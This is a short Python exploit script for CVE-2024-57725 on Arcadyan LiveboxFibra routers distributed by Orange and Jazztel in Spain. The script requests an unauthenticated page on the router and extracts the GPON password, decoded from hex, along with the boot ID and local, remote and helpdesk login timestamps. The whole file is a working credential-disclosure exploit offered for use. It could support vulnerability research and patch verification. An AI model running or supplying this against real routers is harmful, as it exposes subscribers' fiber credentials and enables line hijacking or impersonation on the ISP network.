#!/usr/bin/python3
#
# Exploit Title: GPON Link Manipulation Vulnerability in Arcadyan Routers (Distributed by Orange and Jazztel)
# Date: 01/14/2025
# Exploit Author: pointedsec
# Vendor Homepage: https://www.arcadyan.com
# Affected ISPs: Orange and Jazztel (Spain)
# Tested on: Arcadyan routers distributed by Orange and Jazztel - LiveboxFibra (PRV3399B_B_LT)
# CVE: CVE-2024-57725
#
import requests
import re
from urllib.parse import unquote
from datetime import datetime

ROUTER_IP = "192.168.1.1"
ONT_VALUE_PATH = "/cgi/cgi_authpage.js"

def convert_to_human_readable(timestamp):
    try:
        # Parsear marcas de tiempo solo si tienen formato de fecha/hora
        if timestamp and timestamp != "0":
            # Separar fecha y hora
            date_str, time_str = timestamp.split()
            # Convertir a objeto datetime
            dt = datetime.strptime(date_str + time_str, "%d%m%y%H%M")
            return dt.strftime("%Y-%m-%d %H:%M:%S")
        return "Nunca"  # Si es "0" o vacío, indicar que no hay registro
    except ValueError:
        return timestamp

def hex_to_ascii(hex_value):
    try:
        return bytes.fromhex(hex_value).decode("ascii")
    except ValueError:
        return hex_value

def main():
    r = requests.get("http://"+ROUTER_IP+ONT_VALUE_PATH)
    patterns = {
        "slid_value (GPON PASSWORD VALUE)": r'addCfg\("slid_value",\d+,\s*\'(.*?)\'\)',
        "boot_id": r'addCfg\("boot_id",\d+,\s*\'(.*?)\'\)',
        "last_local_login": r'addCfg\("last_local_login",\d+,\s*\'(.*?)\'\)',
        "last_remote_login": r'addCfg\("last_remote_login",\d+,\s*\'(.*?)\'\)',
        "last_helpdesk_login": r'addCfg\("last_helpdesk_login",\d+,\s*\'(.*?)\'\)',
    }
    results = {}
    
    for key, pattern in patterns.items():
            match = re.search(pattern, r.text)
            if match:
                value = match.group(1)
                if key in ["boot_id", "last_local_login", "last_remote_login", "last_helpdesk_login"]:
                    value = unquote(value)
                if key in ["last_local_login", "last_remote_login", "last_helpdesk_login"]:
                    value = convert_to_human_readable(value)
                if key == "slid_value (GPON PASSWORD VALUE)":
                    value = hex_to_ascii(value)
                results[key] = value
                    

    for key, value in results.items():
        print(f"{key}: {value}")
    
if __name__ == "__main__":
    main()
